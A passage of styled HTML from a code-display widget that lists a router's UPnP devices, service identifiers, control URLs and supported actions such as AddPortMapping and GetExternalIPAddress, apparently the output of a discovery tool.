51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetDefaultConnectionService</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDefaultConnectionService</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">urn:schemas-upnp-org:device:WANDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wancommoninterfaceconfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANCommonInterfaceConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANCommonInterfaceConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wancommoninterfaceconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetEnabledForInternet</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetEnabledForInternet</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetCommonLinkProperties</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalBytesSent</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalBytesReceived</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalPacketsSent</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalPacketsReceived</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">urn:schemas-upnp-org:device:WANConnectionDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANIPConnection:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wanipconnection1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANIPConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANIPConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wanipconnectionSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetConnectionType</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetConnectionTypeInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetAutoDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetAutoDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetIdleDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetIdleDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetWarnDisconnectDelay</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetWarnDisconnectDelay</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetStatusInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetNATRSIPStatus</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetGenericPortMappingEntry</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetSpecificPortMappingEntry</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> AddPortMapping</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> DeletePortMapping</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetExternalIPAddress</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ForceTermination</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> RequestTermination</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> RequestConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANCableLinkConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:WANCableLinkConfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; 